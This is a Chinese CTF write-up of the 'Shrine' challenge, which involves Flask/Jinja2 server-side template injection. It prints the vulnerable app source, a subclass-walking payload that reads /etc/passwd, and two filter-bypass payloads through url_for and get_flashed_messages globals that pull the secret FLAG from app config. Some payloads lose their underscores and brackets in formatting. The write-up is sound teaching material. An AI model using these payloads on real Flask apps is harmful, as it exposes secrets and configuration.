[CTF]攻防世界:Shrin(SSTI)

题目:攻防世界:Shrin(SSTI)

提示:题目代码

bash 复制代码
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
  1. /shrine/路由接收任意路径参数
  2. render_template_string()直接渲染用户输入
  3. 过滤机制:()被删除,config和self变量被设为None
  4. 无法使用 subclasses()、popen() 等带括号的函数
bash 复制代码
无法使用
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

步骤

1. 利用Flask全局函数访问current_app

Payload: /shrine/{{url_for.globals'current_app'.config.FLAG}}

原理:

url_for 是Flask内置全局函数,无需括号即可访问__globals__ 获取函数的全局变量字典(无括号)current_app

指向当前的Flask应用实例app 通过 current_app.config 访问被"隐藏"的配置

2. 利用get_flashed_messages

替代Payload:

/shrine/{{get_flashed_messages.globals'current_app'.config'FLAG'}}

原理:与url_for类似,利用另一个Flask全局函数绕过限制。

相关推荐
云水一下13 小时前
零基础玩转 bWAPP 靶场(五):HTML 注入——存储型(博客)
web安全·html·bwapp·存储型注入
Chockmans17 小时前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
Lucky_55668818 小时前
山东政务信息化项目验收:软件合规测试筑牢交付关键防线
功能测试·安全·web安全·信息与通信·政务
小小小小钰儿2 天前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
NOVAnet20232 天前
SASE 架构如何为本地 DeepSeek 大模型提供全域网络安全支撑
web安全·安全架构·sd-wan·sase·零信任访问
NOVAnet20232 天前
云网 + 存储一体化灾备方案解析:南凌科技 × 爱数全景云灾备技术与行业落地价值
科技·web安全·企业数字化·企业sd-wan·混合云网络
数据知道3 天前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Gyr03 天前
关于证书站捡洞这一档事
安全·web安全
网安蟹佬霸3 天前
我国网络安全人才缺口现状、成因与对策研究
安全·web安全
云水一下3 天前
零基础玩转bWAPP靶场(一):从起源到环境搭建,开启Web安全实战之旅
web安全·靶场·bwapp